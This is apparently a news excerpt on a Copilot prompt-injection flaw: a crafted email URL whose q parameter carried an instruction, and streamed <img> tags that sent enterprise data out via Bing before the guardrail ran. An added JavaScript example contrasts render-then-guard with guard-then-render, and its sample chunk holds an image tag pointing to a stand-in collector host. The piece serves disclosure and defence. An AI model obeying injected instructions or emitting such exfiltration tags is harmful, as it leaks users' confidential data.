Copilot flaw let attackers exfiltrate enterprise data via image requests

Source: Biz & IT - Ars Technica

Researchers demonstrated a Parameter-to-Prompt Injection by sending a targeted email containing a URL with this syntax: https://m365.cloud.microsoft/search/?auth=2&origindomain=microsoft365&q=. The q field carried an instruction and Copilot complied. "The search functionality is exactly what attackers need, because even with limited capabilities, a user with access to critical information is enough," the researchers wrote.

The problem arose because Copilot streamed raw HTML during its "thinking" phase, which the browser temporarily rendered. The sequence: Copilot starts streaming its response, which includes an <img> tag; the browser sees the <img>, renders it, and fires off an HTTP request to the src URL; Copilot finishes generating; the guardrail wraps everything in —Too late!

The request already left. Because Copilot blocks most image requests, the exploit used Microsoft's Bing as a trampoline.
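The ordering problem described above, modelled as an added example (not code from the article, the researchers or Microsoft): the same streamed chunks go through a render-then-guard pipeline and a guard-then-render pipeline, and the example records which image URLs the browser would fetch. The function names, the regex standing in for browser rendering, and the sample chunks and URL are constructed assumptions.

```javascript
// Added example: a model of the streaming race, not Copilot's code.
// "Rendering" is modelled as: any complete <img ... src=...> in the markup
// handed to the DOM makes the browser fetch that URL.
const IMG_SRC = /<img\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)[^>]*>/gi;

function fetchesTriggered(markup) {
  return [...markup.matchAll(IMG_SRC)].map((m) => m[1]);
}

function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return text.replace(/[&<>"']/g, (c) => map[c]);
}

// Flawed order: raw chunks are rendered as they arrive; the guardrail
// neutralises the markup only after generation has finished.
function renderThenGuard(chunks) {
  const fetched = new Set();
  let buffer = "";
  for (const chunk of chunks) {
    buffer += chunk;
    fetchesTriggered(buffer).forEach((u) => fetched.add(u)); // partial render
  }
  return { fetched: [...fetched], finalMarkup: escapeHtml(buffer) };
}

// Corrected order: each chunk is escaped before it reaches the DOM.
// Escaping is per character, so a tag split across chunks is still inert.
function guardThenRender(chunks) {
  const fetched = new Set();
  let buffer = "";
  for (const chunk of chunks) {
    buffer += escapeHtml(chunk);
    fetchesTriggered(buffer).forEach((u) => fetched.add(u));
  }
  return { fetched: [...fetched], finalMarkup: buffer };
}

// Constructed model output; the tag is split across chunk boundaries.
const SAMPLE_CHUNKS = [
  "Here is the summary. <im",
  'g src="https://collector.example.test/p.gif?d=',
  'CONSTRUCTED_VALUE">',
  " Done.",
];
```

Both pipelines end with identical, fully escaped markup; only the first one lets a request leave before the guardrail runs, which is why inspecting the final rendered output alone would not reveal the difference.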
